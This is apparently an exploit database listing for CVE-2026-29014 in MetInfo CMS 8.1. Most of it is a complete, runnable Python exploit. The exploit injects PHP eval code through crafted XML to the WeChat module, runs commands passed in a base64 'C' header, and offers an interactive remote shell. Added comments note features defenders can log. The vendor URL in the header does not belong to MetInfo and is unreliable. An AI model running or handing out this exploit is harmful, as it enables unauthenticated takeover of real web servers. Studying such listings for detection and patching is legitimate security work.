
📄 MetInfo CMS 8.1 PHP Code Injection

🗓️ 24 Apr 2026 00:00:00 · Reported by indoushka · Type: packetstorm
🔗 packetstorm.news👁 99 Views

MetInfo CMS 8.1 PHP code injection RCE via weixin module with crafted XML and HTTP inputs.

Related
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2026-29014
1 Apr 202615:26
circl
CNNVD
MetInfo CMS 安全漏洞
1 Apr 202600:00
cnnvd
CVE
CVE-2026-29014
1 Apr 202612:22
cve
Cvelist
CVE-2026-29014 MetInfo CMS Unauthenticated PHP Code Injection RCE
1 Apr 202612:22
cvelist
EUVD
EUVD-2026-17875
1 Apr 202615:31
euvd
Nuclei
MetInfo CMS <= 8.1 - Remote Code Execution
24 Jun 202603:02
nuclei
NVD
CVE-2026-29014
1 Apr 202613:16
nvd
Packet Storm
📄 MetInfo CMS 8.1 Code Injection
1 Apr 202600:00
packetstorm
Packet Storm
📄 MetInfo CMS 8.1 Shell Upload Mass Exploiter
24 Apr 202600:00
packetstorm
Packet Storm News
MetInfo CMS 8.1 WeChat Module Vulnerability Detection Scanner
24 Apr 202600:00
packetstormnews
==================================================================================================================================
    | # Title     : MetInfo CMS 8.1 PHP Code Injection RCE Exploit                                                                   |
    | # Author    : indoushka                                                                                                        |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                 |
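    | # Vendor    : https://github.com/facebookincubator/below   (reviewer note: this URL is not a MetInfo address — verify the vendor against the CVE-2026-29014 record) |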
    ==================================================================================================================================
    
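    [+] Summary    : This Python script is a full remote code execution (RCE) exploit suite targeting a vulnerability in MetInfo CMS (≤ 8.1), identified as CVE-2026-29014.
                     The flaw resides in the request-handling logic of the weixin (WeChat) module, where improperly sanitized input allows PHP code injection via crafted XML and HTTP parameters/headers.
                     In the listing below, every request is a POST to /app/system/entrance.php with n=include, m=module, c=weixin and a=doapi, which is the request pattern to look for in web-server logs.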
    
    
    [+] POC        :  
    
    #!/usr/bin/env python3
    
    import requests
    import sys
    import argparse
    import base64
    import re
    import time
    import random
    import string
    from urllib.parse import urljoin
    from threading import Thread
    import socket
    import telnetlib
    
    import urllib3
    # Suppresses urllib3's InsecureRequestWarning. The session created in
    # MetInfoExploit.__init__ sets verify = False, so TLS certificates are not
    # validated; this call only hides the warning that would report it.
    urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
    
    # Text printed once by main() before any request is sent.
    BANNER = """
    ╔═══════════════════════════════════════════════════════════════════════════╗
    ║  CVE-2026-29014 - MetInfo CMS PHP Code Injection by indoushka             ║
    ╚═══════════════════════════════════════════════════════════════════════════╝
    """
    
    
    class MetInfoExploit:
        """Proof-of-concept client for CVE-2026-29014 (MetInfo CMS, weixin module).

        Every request built by this class is a POST to
        ``/app/system/entrance.php`` with the query parameters
        ``n=include&m=module&c=weixin&a=doapi`` and an XML body.

        Defender view: the observable request features in this listing are
        that path/parameter combination, an ``EventKey`` element containing
        ``../``, a ``FromUserName`` element containing PHP ``{${...}}`` syntax,
        and a one-letter ``C`` request header carrying base64 text.
        """

        def __init__(self, target_url, proxy=None, timeout=30, verbose=False):
            """Store the target and build the HTTP session.

            Args:
                target_url: Base URL of the site; a trailing ``/`` is stripped.
                proxy: Optional proxy URL applied to both http and https.
                timeout: Per-request timeout in seconds passed to requests.
                verbose: Stored on the instance and consulted by ``log``.
            """
            self.target_url = target_url.rstrip('/')
            self.timeout = timeout
            self.verbose = verbose
            self.session = requests.Session()
            # TLS certificate verification is switched off for every request
            # made through this session.
            self.session.verify = False
            # Endpoint and routing parameters used by both requests below.
            self.vuln_path = "/app/system/entrance.php"
            self.params = {
                'n': 'include',
                'm': 'module',
                'c': 'weixin',
                'a': 'doapi'
            }
            # injection_header is filled in by execute_command; webshell_url is
            # initialised here and not referenced anywhere else in this listing.
            self.injection_header = None
            self.webshell_url = None
    
            if proxy:
                self.session.proxies = {'http': proxy, 'https': proxy}
    
        def log(self, msg, level="[+]"):
            """Print ``msg`` prefixed with ``level``.

            Messages tagged ``[+]``, ``[!]`` or ``[-]`` are always printed; the
            ``verbose`` flag only matters for any other level string.
            """
            if self.verbose or level in ["[+]", "[!]", "[-]"]:
                print(f"{level} {msg}")
    
        def trigger_cache_write(self):
            """Send the first-stage XML body to the weixin endpoint.

            Returns:
                True when the server answers HTTP 200, False for any other
                status or when requests raises an exception.

            The name suggests the server stores part of this body in a cache
            file; what happens server-side is not visible from this client
            code.
            """
            self.log("Triggering initial cache write...")
    
            # The XML mimics a SCAN event. EventKey carries a relative path
            # with ``../``; FromUserName carries PHP ``{${...}}`` syntax that
            # evaluates the base64-decoded value of a ``$_SERVER`` entry whose
            # key is spelled with chr() codes 72,84,84,80,95,67 ("HTTP_C"),
            # i.e. the request header named ``C``.
            # Detection: ``{${``, ``eval(`` and ``base64_decode(`` appear
            # literally in this request body.
            payload = '''<x>
    <MsgType>event</MsgType>
    <Event>SCAN</Event>
    <EventKey>adminlogin&#x26;../config/tables</EventKey>
    <FromUserName>{${eval(base64_decode($_SERVER[chr(72).chr(84).chr(84).chr(80).chr(95).chr(67)]))}}{${die()}}</FromUserName>
    </x>'''
    
            url = urljoin(self.target_url, self.vuln_path)
    
            try:
                response = self.session.post(
                    url,
                    params=self.params,
                    data=payload,
                    headers={'Content-Type': 'application/xml'},
                    timeout=self.timeout
                )
    
                # Only the status code is inspected; the response body is ignored.
                return response.status_code == 200
    
            except requests.exceptions.RequestException:
                return False
    
        def build_php_payload(self, cmd, php_func='passthru'):
            """Return the base64 text placed in the ``C`` header.

            The encoded PHP snippet changes directory two levels up, prints the
            marker ``_____``, calls ``php_func`` on the base64-decoded ``cmd``
            and prints the marker again. ``cmd`` is therefore base64-encoded
            twice on the wire, so the command text is not visible in plain
            form in request logs.
            """
            b64_cmd = base64.b64encode(cmd.encode()).decode()
            php_code = f"chdir('../..');print('_____');{php_func}(base64_decode('{b64_cmd}'));print('_____');"
            return base64.b64encode(php_code.encode()).decode()
    
        def execute_command(self, cmd, php_func='passthru'):
            """Send both requests for one command and return its output.

            Each call issues two POSTs to the same endpoint: the first-stage
            body from ``trigger_cache_write`` and then a second body whose
            ``EventKey`` is ``adminlogin&#x26;Array``, accompanied by a ``C``
            request header.

            Returns:
                The text between the two ``_____`` markers when present, the
                whole stripped response body when HTTP 200 arrives without
                markers, or None on a non-200 status or a requests exception.
            """
            # The boolean result of the first stage is not checked.
            self.trigger_cache_write()
    
            b64_payload = self.build_php_payload(cmd, php_func)
            # Kept on the instance and sent below as the value of the ``C`` header.
            self.injection_header = f"C: {b64_payload}"
    
            payload = '''<x>
    <MsgType>event</MsgType>
    <Event>SCAN</Event>
    <EventKey>adminlogin&#x26;Array</EventKey>
    <FromUserName>test</FromUserName>
    </x>'''
    
            url = urljoin(self.target_url, self.vuln_path)
    
            try:
                response = self.session.post(
                    url,
                    params=self.params,
                    data=payload,
                    headers={
                        'Content-Type': 'application/xml',
                        'C': self.injection_header
                    },
                    timeout=self.timeout
                )
    
                if response.status_code == 200:
                    # DOTALL lets the captured output span multiple lines.
                    match = re.search(r'_____(.*?)_____', response.text, re.DOTALL)
                    if match:
                        return match.group(1).strip()
                    return response.text.strip()
    
            except requests.exceptions.RequestException:
                # Request errors are swallowed; control falls through to None.
                pass
    
            return None
    
        def check_vulnerability(self):
            """Report whether a test command's output comes back from the target.

            This is an active check, not a passive fingerprint: it runs
            ``echo CVE_2026_29014_TEST`` through ``execute_command`` and looks
            for that string in the returned text.

            Returns:
                True when the test string is found, otherwise False.
            """
            self.log("Checking vulnerability...")
    
            test = self.execute_command("echo CVE_2026_29014_TEST")
    
            if test and "CVE_2026_29014_TEST" in test:
                self.log("VULNERABLE!", "[+]")
                return True
    
            self.log("Not vulnerable", "[-]")
            return False
    
        def interactive_shell(self):
            """Read lines from stdin and pass each one to ``execute_command``.

            The loop ends on ``exit``, ``quit`` or Ctrl-C. Every line entered
            produces the same pair of POST requests described on
            ``execute_command``.
            """
            while True:
                try:
                    cmd = input("shell# ").strip()
                    if cmd in ["exit", "quit"]:
                        break
    
                    result = self.execute_command(cmd)
                    # An empty string or None is shown as a placeholder.
                    print(result if result else "[no output]")
    
                except KeyboardInterrupt:
                    break
    
    
    def exploit_metinfo_rce(target_url, cmd=None, interactive=False,
                            proxy=None, verbose=False):
        """Drive one run of MetInfoExploit against ``target_url``.

        Args:
            target_url: Base URL handed to MetInfoExploit.
            cmd: Optional single command; its result is printed.
            interactive: When true and ``cmd`` is not given, start the
                interactive loop.
            proxy: Optional proxy URL handed to MetInfoExploit.
            verbose: Verbosity flag handed to MetInfoExploit.

        Returns:
            False when ``check_vulnerability`` fails, otherwise True.
        """
    
        # timeout is not passed, so the class default of 30 seconds applies.
        exploit = MetInfoExploit(target_url, proxy, verbose=verbose)
    
        # The check itself already executes a test command on the target.
        if not exploit.check_vulnerability():
            return False
    
        # A supplied command takes precedence over interactive mode.
        if cmd:
            print(exploit.execute_command(cmd))
            return True
    
        if interactive:
            exploit.interactive_shell()
    
        return True
    
    
    def main():
        """Parse the command line, print BANNER and call exploit_metinfo_rce.

        Options: ``-u/--url`` (required), ``-c/--command``,
        ``-i/--interactive``, ``--proxy`` and ``-v/--verbose``. The return
        value of exploit_metinfo_rce is discarded, so the process exit status
        does not reflect whether the check succeeded.
        """
        parser = argparse.ArgumentParser()
        parser.add_argument('-u', '--url', required=True)
        parser.add_argument('-c', '--command')
        parser.add_argument('-i', '--interactive', action='store_true')
        parser.add_argument('--proxy')
        parser.add_argument('-v', '--verbose', action='store_true')
    
        args = parser.parse_args()
    
        print(BANNER)
    
        exploit_metinfo_rce(
            target_url=args.url,
            cmd=args.command,
            interactive=args.interactive,
            proxy=args.proxy,
            verbose=args.verbose
        )
    
    
    # Run the command-line entry point only when executed as a script,
    # not when the module is imported.
    if __name__ == "__main__":
        main()
    	
    Greetings to :==============================================================================
    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
    ============================================================================================


24 Apr 2026 00:00 — Current
6.5 — Medium risk
Vulners AI Score: 6.5
CVSS 4: 9.3
CVSS 3.1: 9.8
EPSS: 0.39688
SSVC
99